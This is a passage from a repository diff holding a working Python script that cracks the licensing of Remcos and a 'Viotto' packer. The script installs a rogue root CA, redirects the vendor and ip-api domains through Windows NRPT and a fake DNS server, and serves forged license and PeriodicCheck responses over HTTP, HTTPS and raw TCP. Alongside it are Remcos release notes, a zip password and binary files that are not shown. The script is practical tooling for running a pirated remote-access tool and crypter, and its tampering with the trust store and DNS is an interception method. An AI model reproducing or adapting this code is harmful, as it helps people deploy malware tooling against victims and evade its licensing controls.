subprocess.run(["openssl", "req", "-x509", "-newkey", "rsa:2048", "-nodes",
|
||||
"-keyout", CA_KEY, "-out", CA_CERT, "-days", "3650",
|
||||
"-subj", "/CN=Remcos Test CA"], capture_output=True, check=True)
|
||||
|
||||
csr = os.path.join(CERT_DIR, "server.csr")
|
||||
ext = os.path.join(CERT_DIR, "ext.cnf")
|
||||
with open(ext, "w") as f:
|
||||
f.write("[v3_req]\nsubjectAltName=DNS:breakingsec.io,DNS:*.breakingsec.io,"
|
||||
"DNS:breakingsecurity.net,DNS:*.breakingsecurity.net,"
|
||||
"DNS:pro.ip-api.com,DNS:*.ip-api.com,DNS:localhost\n"
|
||||
"basicConstraints=CA:FALSE\nkeyUsage=digitalSignature,keyEncipherment\n"
|
||||
"extendedKeyUsage=serverAuth\n")
|
||||
|
||||
subprocess.run(["openssl", "req", "-newkey", "rsa:2048", "-nodes",
|
||||
"-keyout", SRV_KEY, "-out", csr, "-subj", "/CN=breakingsec.io"],
|
||||
capture_output=True, check=True)
|
||||
|
||||
subprocess.run(["openssl", "x509", "-req", "-in", csr, "-CA", CA_CERT,
|
||||
"-CAkey", CA_KEY, "-CAcreateserial", "-out", SRV_CERT, "-days", "3650",
|
||||
"-extfile", ext, "-extensions", "v3_req"], capture_output=True, check=True)
|
||||
|
||||
print("[+] Certificates generated.")
|
||||
return True
|
||||
except Exception as e:
|
||||
print(f"[-] Cert generation failed: {e}")
|
||||
return False
|
||||
|
||||
def install_ca():
|
||||
r = subprocess.run(["certutil", "-addstore", "-f", "Root", CA_CERT],
|
||||
capture_output=True, text=True)
|
||||
if r.returncode == 0:
|
||||
print("[+] CA cert installed in trust store.")
|
||||
else:
|
||||
print(f"[-] CA install failed: {r.stderr[:100]}")
|
||||
|
||||
def remove_ca():
|
||||
subprocess.run(["certutil", "-delstore", "Root", "Remcos Test CA"],
|
||||
capture_output=True)
|
||||
|
||||
# ============================================================
|
||||
# NRPT
|
||||
# ============================================================
|
||||
def setup_nrpt():
|
||||
print("[*] Setting NRPT rules...")
|
||||
for guid, domains in NRPT_GUIDS:
|
||||
names_str = ",".join(f"'{d}'" for d in domains)
|
||||
ps = f"""
|
||||
$p = '{NRPT_BASE}\\{guid}'
|
||||
New-Item -Path $p -Force | Out-Null
|
||||
Set-ItemProperty -Path $p -Name 'Name' -Value @({names_str}) -Type MultiString
|
||||
Set-ItemProperty -Path $p -Name 'GenericDNSServers' -Value '127.0.0.1' -Type String
|
||||
Set-ItemProperty -Path $p -Name 'ConfigOptions' -Value 8 -Type DWord
|
||||
Set-ItemProperty -Path $p -Name 'Version' -Value 2 -Type DWord
|
||||
"""
|
||||
r = subprocess.run(["powershell", "-Command", ps], capture_output=True, text=True, timeout=10)
|
||||
if r.returncode == 0:
|
||||
print(f" [+] {', '.join(domains)} -> 127.0.0.1")
|
||||
else:
|
||||
print(f" [-] {domains[0]}: {r.stderr.strip()[:80]}")
|
||||
|
||||
subprocess.run(["ipconfig", "/flushdns"], capture_output=True, timeout=10)
|
||||
subprocess.run(["powershell", "-Command", "Clear-DnsClientCache; Register-DnsClient"],
|
||||
capture_output=True, timeout=10)
|
||||
|
||||
def cleanup_nrpt():
|
||||
for guid, _ in NRPT_GUIDS:
|
||||
ps = f"Remove-Item -Path '{NRPT_BASE}\\{guid}' -Recurse -Force -ErrorAction SilentlyContinue"
|
||||
subprocess.run(["powershell", "-Command", ps], capture_output=True, timeout=10)
|
||||
subprocess.run(["ipconfig", "/flushdns"], capture_output=True, timeout=10)
|
||||
|
||||
# ============================================================
|
||||
# DNS Server
|
||||
# ============================================================
|
||||
class DNSHandler(socketserver.BaseRequestHandler):
|
||||
def handle(self):
|
||||
data = self.request[0]
|
||||
sock = self.request[1]
|
||||
try:
|
||||
domain = self._parse_domain(data).lower().rstrip(".")
|
||||
redirect = any(domain == d or domain.endswith("." + d)
|
||||
for d in REDIRECT_DOMAINS)
|
||||
if redirect:
|
||||
resp = self._build_response(data, "127.0.0.1")
|
||||
sock.sendto(resp, self.client_address)
|
||||
else:
|
||||
fwd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
fwd.settimeout(3)
|
||||
fwd.sendto(data, (REAL_DNS, 53))
|
||||
try:
|
||||
r, _ = fwd.recvfrom(4096)
|
||||
sock.sendto(r, self.client_address)
|
||||
except socket.timeout:
|
||||
pass
|
||||
fwd.close()
|
||||
except:
|
||||
pass
|
||||
|
||||
def _parse_domain(self, data):
|
||||
parts, idx = [], 12
|
||||
while idx < len(data):
|
||||
l = data[idx]
|
||||
if l == 0: break
|
||||
idx += 1
|
||||
parts.append(data[idx:idx+l].decode("ascii", errors="replace"))
|
||||
idx += l
|
||||
return ".".join(parts)
|
||||
|
||||
def _build_response(self, query, ip):
|
||||
resp = bytearray(query[:2]) + b'\x81\x80' + query[4:6] + b'\x00\x01\x00\x00\x00\x00'
|
||||
idx = 12
|
||||
while idx < len(query):
|
||||
if query[idx] == 0:
|
||||
idx += 5
|
||||
break
|
||||
idx += 1 + query[idx]
|
||||
resp += query[12:idx]
|
||||
resp += b'\xc0\x0c\x00\x01\x00\x01\x00\x00\x0e\x10\x00\x04'
|
||||
resp += socket.inet_aton(ip)
|
||||
return bytes(resp)
|
||||
|
||||
# ============================================================
|
||||
# HTTP/HTTPS Server
|
||||
# ============================================================
|
||||
class FakeHandler(http.server.BaseHTTPRequestHandler):
|
||||
def log_message(self, fmt, *args):
|
||||
ts = datetime.now().strftime("%H:%M:%S")
|
||||
print(f" [{ts}] {fmt % args}")
|
||||
|
||||
def send_text(self, text, code=200):
|
||||
data = text.encode("utf-8")
|
||||
self.send_response(code)
|
||||
self.send_header("Content-Type", "text/plain")
|
||||
self.send_header("Content-Length", str(len(data)))
|
||||
self.send_header("Connection", "close")
|
||||
self.end_headers()
|
||||
self.wfile.write(data)
|
||||
|
||||
def route(self):
|
||||
path = urlparse(self.path).path.lower()
|
||||
host = self.headers.get("Host", "")
|
||||
qs = parse_qs(urlparse(self.path).query)
|
||||
print(f" -> {self.command} {self.path} (Host: {host})")
|
||||
# Dump ALL headers for debugging
|
||||
for h_name, h_val in self.headers.items():
|
||||
print(f" {h_name}: {h_val}")
|
||||
|
||||
if "whitelist" in path:
|
||||
print(f" <- Whitelist: EMPTY")
|
||||
self.send_text("")
|
||||
return
|
||||
if "signalabuse" in path:
|
||||
print(f" <- Abuse absorbed")
|
||||
self.send_text("")
|
||||
return
|
||||
if "licpost" in path or ("keygen" in path and "lic" in path.lower()):
|
||||
lic_raw = qs.get("LIC", [""])[0]
|
||||
parts = lic_raw.split("|")
|
||||
print(f" ***** KeyGen LicPost! *****")
|
||||
print(f" Parts: {parts}")
|
||||
# Try response matching request format: pipe-delimited after "0\n"
|
||||
key = parts[0] if len(parts) > 0 else ""
|
||||
email = parts[1] if len(parts) > 1 else ""
|
||||
# Format: 0\nkey|email|product|expiry|type|version
|
||||
resp = f"0\n{key}|{email}|Remcos|20301231|Pro|7.2.2"
|
||||
print(f" <- Responding: '{resp}'")
|
||||
self.send_text(resp)
|
||||
return
|
||||
if "upd_pro" in path:
|
||||
print(f" <- Version: {VERSION}")
|
||||
self.send_text(VERSION + "\n")
|
||||
return
|
||||
# PeriodicCheck - license validation with hash + expiry
|
||||
if "periodiccheck" in path:
|
||||
lic = qs.get("LIC", ["?"])[0]
|
||||
resp = "49ef9592748fac8986f0d360454dbab0\n20301231\nRemcos"
|
||||
print(f" ***** PeriodicCheck (LIC={lic[:24]}) -> {repr(resp)} *****")
|
||||
self.send_text(resp)
|
||||
return
|
||||
# Auth/license check - sign with our private key
|
||||
if "auth" in path or "check" in path or "verify" in path or "validate" in path:
|
||||
print(f" ***** Auth endpoint: {self.path} *****")
|
||||
self.send_text("0\n20301231\nPro\n7.2.2")
|
||||
return
|
||||
if "onlinecheck" in path:
|
||||
print(f" <- OnlineCheck: {VERSION}")
|
||||
self.send_text(VERSION + "\n")
|
||||
return
|
||||
if "/line" in path or "ip-api" in host:
|
||||
print(f" <- GeoIP")
|
||||
self.send_text(GEO_RESPONSE + "\n")
|
||||
return
|
||||
print(f" *** UNKNOWN ENDPOINT: {self.path} ***")
|
||||
print(f" *** Host: {host} ***")
|
||||
# Return "0" instead of empty - empty might cause range check errors
|
||||
self.send_text("0")
|
||||
|
||||
def do_GET(self): self.route()
|
||||
def do_POST(self):
|
||||
cl = int(self.headers.get("Content-Length", 0))
|
||||
body = self.rfile.read(cl) if cl > 0 else b""
|
||||
if body:
|
||||
try: print(f" POST body: {body[:300].decode('utf-8', errors='replace')}")
|
||||
except: print(f" POST body: {body[:100].hex()}")
|
||||
self.route()
|
||||
|
||||
# ============================================================
|
||||
# Main
|
||||
# ============================================================
|
||||
def main():
|
||||
print("=" * 60)
|
||||
print(" Fake Server (standalone) - stays running")
|
||||
print(" Launch Remcos/KeyGen yourself while this runs")
|
||||
print("=" * 60)
|
||||
|
||||
if not ctypes.windll.shell32.IsUserAnAdmin():
|
||||
print("[-] Need Administrator! Right-click -> Run as admin")
|
||||
return 1
|
||||
|
||||
# Setup
|
||||
generate_certs()
|
||||
install_ca()
|
||||
|
||||
# CA bundle for OpenSSL apps
|
||||
ca_bundle = os.path.join(CERT_DIR, "ca_bundle.pem")
|
||||
try:
|
||||
import certifi
|
||||
system_ca = certifi.where()
|
||||
except ImportError:
|
||||
system_ca = None
|
||||
with open(ca_bundle, "w") as out:
|
||||
with open(CA_CERT) as f: out.write(f.read() + "\n")
|
||||
if system_ca and os.path.exists(system_ca):
|
||||
with open(system_ca) as f: out.write(f.read())
|
||||
os.environ["SSL_CERT_FILE"] = ca_bundle
|
||||
os.environ["SSL_CERT_DIR"] = CERT_DIR
|
||||
|
||||
# Start servers
|
||||
dns = socketserver.UDPServer(("127.0.0.1", 53), DNSHandler)
|
||||
threading.Thread(target=dns.serve_forever, daemon=True).start()
|
||||
print("[+] DNS on 127.0.0.1:53")
|
||||
|
||||
http_srv = http.server.HTTPServer(("0.0.0.0", 80), FakeHandler)
|
||||
threading.Thread(target=http_srv.serve_forever, daemon=True).start()
|
||||
print("[+] HTTP on 0.0.0.0:80")
|
||||
|
||||
try:
|
||||
class LoggingHTTPS(http.server.HTTPServer):
|
||||
def handle_error(self, request, client_address):
|
||||
print(f" [SSL ERROR] from {client_address}: {sys.exc_info()[1]}")
|
||||
https_srv = LoggingHTTPS(("0.0.0.0", 443), FakeHandler)
|
||||
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
|
||||
ctx.load_cert_chain(SRV_CERT, SRV_KEY)
|
||||
https_srv.socket = ctx.wrap_socket(https_srv.socket, server_side=True)
|
||||
threading.Thread(target=https_srv.serve_forever, daemon=True).start()
|
||||
print("[+] HTTPS on 0.0.0.0:443")
|
||||
except Exception as e:
|
||||
print(f"[-] HTTPS failed: {e}")
|
||||
|
||||
# Port 45000 - Viotto packer license validation (raw TCP protocol!)
|
||||
def handle_viotto_client(conn, addr):
|
||||
print(f"\n *** PORT 45000 CONNECTION from {addr} ***")
|
||||
conn.settimeout(5)
|
||||
try:
|
||||
# Read whatever the client sends
|
||||
data = conn.recv(4096)
|
||||
print(f" *** RECEIVED ({len(data)} bytes): {data[:200].hex()}")
|
||||
try:
|
||||
print(f" *** AS TEXT: {data[:200].decode('ascii', errors='replace')}")
|
||||
except:
|
||||
pass
|
||||
# Echo back for now - we need to see the protocol first
|
||||
conn.sendall(data)
|
||||
print(f" *** Echoed {len(data)} bytes back")
|
||||
except socket.timeout:
|
||||
print(f" *** PORT 45000: recv timeout (client didn't send data)")
|
||||
except Exception as e:
|
||||
print(f" *** PORT 45000 error: {e}")
|
||||
finally:
|
||||
conn.close()
|
||||
|
||||
def viotto_server():
|
||||
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
srv.bind(("0.0.0.0", 45000))
|
||||
srv.listen(5)
|
||||
print("[+] Raw TCP on 0.0.0.0:45000 (Viotto license port!)")
|
||||
while True:
|
||||
conn, addr = srv.accept()
|
||||
threading.Thread(target=handle_viotto_client, args=(conn, addr), daemon=True).start()
|
||||
|
||||
threading.Thread(target=viotto_server, daemon=True).start()
|
||||
|
||||
# NRPT
|
||||
setup_nrpt()
|
||||
|
||||
# Verify
|
||||
time.sleep(1)
|
||||
for domain in ["breakingsec.io", "breakingsecurity.net"]:
|
||||
try:
|
||||
result = socket.getaddrinfo(domain, 443)
|
||||
ip = result[0][4][0]
|
||||
status = "OK" if ip == "127.0.0.1" else f"WRONG ({ip})"
|
||||
print(f" {domain} -> {ip} [{status}]")
|
||||
except Exception as e:
|
||||
print(f" {domain} -> ERROR: {e}")
|
||||
|
||||
print()
|
||||
print("=" * 60)
|
||||
print(" RUNNING. Now launch KeyGen.exe or Remcos manually.")
|
||||
print(" Press Ctrl+C to stop and clean up.")
|
||||
print("=" * 60)
|
||||
print()
|
||||
|
||||
try:
|
||||
while True:
|
||||
time.sleep(1)
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
finally:
|
||||
print("\n[*] Cleaning up...")
|
||||
cleanup_nrpt()
|
||||
print("[+] NRPT removed")
|
||||
remove_ca()
|
||||
print("[+] CA removed")
|
||||
|
||||
import ctypes
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,9 @@
|
||||
UPDATE NOTES:
|
||||
To keep the configuration of your previous Remcos version (including connection ports, settings...),
|
||||
just move the new Remcos exe file into your previous Remcos folder.
|
||||
|
||||
Remcos is a portable application and stores all of its settings in its current folder.
|
||||
|
||||
Remcos_Settings.ini : General Configuration
|
||||
tls : TLS Keys and Certificates
|
||||
BuilderProfiles : Builder Profiles
|
||||
@@ -0,0 +1,2 @@
|
||||
Zip password is:
|
||||
BreakingSecurity.net
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1 @@
|
||||

|
||||
Binary file not shown.
Binary file not shown.
|
After Width: | Height: | Size: 26 KiB |
@@ -0,0 +1 @@
|
||||

|
||||
Binary file not shown.
Binary file not shown.
|
After Width: | Height: | Size: 27 KiB |
@@ -0,0 +1 @@
|
||||

|
||||
Binary file not shown.
Binary file not shown.
|
After Width: | Height: | Size: 26 KiB |
@@ -0,0 +1 @@
|
||||

|
||||
Binary file not shown.
Binary file not shown.
|
After Width: | Height: | Size: 27 KiB |
@@ -0,0 +1 @@
|
||||

|
||||
Binary file not shown.
Binary file not shown.
|
After Width: | Height: | Size: 13 KiB |
Reference in New Issue
Block a user